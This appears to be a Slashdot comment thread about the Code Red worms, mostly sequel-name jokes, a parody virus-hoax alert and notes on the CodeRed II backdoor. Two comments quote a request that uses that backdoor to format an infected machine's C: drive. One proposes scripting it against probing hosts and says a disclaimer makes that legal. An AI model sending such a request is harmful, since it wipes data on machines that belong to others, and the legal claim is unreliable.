Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

Versions of the worm...

[Moonshadow]

Code Red: A New Worm
Code Red: Microsoft Strikes Back
Code Red: Return of the Virii
Code Red: The Not-so Phantom Menace

And finally...

Code Red: Attack of the Clones

Re:Finally

[insane.idoru]

I think we all know that someone is going to make the horrid desicion of calling it "attack of the Code Red"...

I knew our machines got Code Red

[alfredo]

Because our Blue Screen of Death turned purple.

I want Code Red IV myself...

[QwkHyenA]

Hopefully Code Red IV, when it rolls out next week, will just cut the dang servers OFF

Not bad, but...

[DahGhostfacedFiddlah]

i'm still waiting for the release of Ultra Turbo Code Red XI, Player's Edition...

I've got a virus on my machine

[WillSeattle]

It keeps popping up these annoying ads every time I visit a web site, and leaving them under the browser window, so I have to close each one.

None of my antivirus software packages seem to be able to detect it, though ...

So hard to keep up

[snakecoder]

God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the lasted version on my IIS server?
Tnks.

Re:Back Door? Somebody call the Goatse.cx guy!

[Tackhead]

>My question here is, how the hell do you have a 'wider' backdoor than that?!

Well, suppose we had this giant electronic speculum ;-)

Re:As with the parent, so with the child.

[pmorrison]

True... and the Code Red Resource Kit, the Code Red SDK, 'Programming Code Red', 'Inside Code Red', and, through IDG, 'Code Red for Dummies'!

As with the parent, so with the child.

[pmorrison]

It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?

Saddens me though

[Hammer]

That Linux and Apache are not compatible.
We seem to have a good ways to go befoer everything that runs on Winblows will also run on Linux :-))

Re:More information?

[blakestah]

In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.


What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
Still has the XXX and installs the backdoor

Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall

We can do it for them...

GET /script/root.exe?+%2fc+format+c:

huh .. when does the prequel come out ?

[freaker_TuC]

They should have started with version IV instead of I ...

then they could do some prequels 10 years later ...

codered IV: A new hope
codered V: The code strikes back
codered VI: Return of the code

...

codered I: The iis menace.

Ok. Here's better names.

[hivolt]

How about
Code Red: The Phantom Worm.
Code Red II: Attack of the Clone
Code Red III: Media's Imagination
Code Red IV: A New Worm
Code Red V: The Worm Strikes Back
Code Red VI: Return of the Worm

Like a Movie ...

[mlati]

I wonder when Rocky ..uh ..Code Red IV will be released?

From the article

[slashdot.org]

The Code Red worm spreads surreptitiously through a hole in certain Microsoft software such as Internet Information Server (IIS) Web software and Windows NT or 2000 operating systems

Ah, so Windows NT or 2000 are vulnerable too, uh? God, I love proper journalism.

Serious blow to open source & free software

[Sloppy]

Here we have something that does not come with source code, but people are still able to maintain the program, improve its performance, and then get those improvements quickly out into the field. Even Linux updates don't get distributed this efficiently.

Re:Buffer overflow vulnerabilities

[Anonymous Coward]

I wrote an all-Java OS in 1998 but can't be sure if or how it works... it's still booting.

Not Legal : Patent Problem

[Rashkae]

If you did that, you would run afoul McAffee's Patent on Web based virus removal and system administration.

Is this a trick from Hollywood?

[Anonymous Coward]

I mean, who else would come out with THREE versions of an original idea, each one worse than the one before?!?

Re:Better Names

[epfreed]

How about "Code Red III: Attack of the Clones?"

Thanks for the suggestion

[WillSeattle]

I have no idea how you can make a wider back door than CRII. With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised. Plus, due to the nature of the worm each compromised machine broadcasts its IP address to nearby machines. The only way to get a wider back door than CRII would be to put the back door on EVERY PORT.

OK, it will be ready in an hour, just got to build the array handler routine.

Finally

[nEoN nOoDlE]

Sequels that are actually better than the original.

Dissection of Code Red versions...a timeline:

[Anonymous Coward]

V1: Basic worm code
V1.1: Enhanced code
V2: Back door "feature"
V3: Faster attack "feature"
V3.1: Faster attack and multiple backdoor "feature"

------Today: Slashdot reports Code Red V4

V4: Failed version, the worm can't infect other systems, author too dumb to put dots in IP address
V5: Total code rewrite, GNU licensed, autopatch feature (downloads a copy of bsd or linux and installs it on the NT box)
V5.1: Faster reinstall (err....patch), now the user can select wich OS/distribution.

------Next Week:Meanwhile, Microsoft patents the "Internet Worm" concept.

V6: Final release, the worm now infects the victim's server and start to post comments in Slashdot about Code Red...

If the log hits aren't for you, do the right thing

[Darby]

and see that they go where they belong. I mean seriously, I've seen lot's of sites with a domain name which I thought was some other much more popular site which had a small link at the bottom saying something to the affect of: If you're looking for such and such they're actually located here.
It's just common courtesy provided it isn't a competitors site.

So what you do is set up a script to pull each individual Code Red transaction out of your logs and send an email to support@microsoft.com with a message similar to the following:

A user at IP address x.x.x.x was trying to contact you and got my IP address by mistake. I know how important the needs and desires of your customers are to Microsoft, so I was certain you would want to know about this as soon as possible.

Re:More information?

[ryanr]

The name Code Red came from Marc and Ryan at eEye. When the version of the original Code Red with the "improved" random number generator came out, they named the new variant CRv2, and re-named the first one CRv1. When we found the one that leaves the back doors, inside is the string "CodeRedII", which is used as an atom name. The author named that one himself.

Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.

For people who are asking in other threads here, CRv1 and CRv2 uses NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.

Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?

In any case, if someone is able to translate
this link [mic.go.kr]
That would be a huge help.

More info on Code Red III

[Sideways The Dog]

WARNING, VIRUS ALERT!!!

If you see a message on the boards with a subject line of "Hi, how are you," delete it immediately WITHOUT reading it. It is "Code Red III". This is the most dangerous virus yet. It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer (up to 20 feet). It will recalibrate your refrigerator's coolness setting so all your ice cream melts and milk curdles. It will demagnetize the strips on all your credit cards, reprogram your ATM access code,screw up the tracking on your VCR and use subspace fieldharmonic to scratch any CDs you try to play.

It will give your ex-boy/girlfriend your new phone number. It will program your phone autodial to call only your mother's number. It is insidious and subtle. It is dangerous and terrifying to behold. It will mix antifreeze into your fish tank. It will drink all your beer.It will hide your car keys when you are late for work and interfere with your car radio so that you hear 1940's hits and static while stuck in traffic.

It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card. It will seduce your grandmother. It does not matter if she is dead, such is the power of "Code Red III", it reaches out beyond the grave to sully those things we hold most dear.

It will rewrite your back-up files, changing all your active verbs to passive tense and incorporating undetectable misspellings which grossly change the interpretation of key sentences.

"Code Red III" will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub. It will wantonly remove the forbidden tags from your mattresses and pillows,and refill your skim milk with whole. "Code Red III" is an evil virus conceived by evil people. It is also a rather interesting shade of mauve. These are just a few signs. Be very, very afraid. PLEASE FORWARD THIS MESSAGE TO EVERYONE YOU KNOW!!!

Re:Version 3? Don't think so.

[grytpype]

Oh, so that's why Slashdot sucks so much. Thanks for the info.

Re:Serious blow to open source & free software

[Mike Schiraldi]

I guess this is the Push Technology thing they made such a fuss about a few years ago.

Re:Code Red (I,II,III) Fix for Apache webservers

[CM39]

I tried redirecting it and it didn't work. :-)

Re:More information?

[BigBlockMopar]

We can do it for them...
GET /script/root.exe?+%2fc+format+c:

Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

Interesting Irony

[Naerbnic]

So, Three Code Reds and a SirCam later, the question just begs to be asked:

Who's calling Whose code "Potentially Viral"?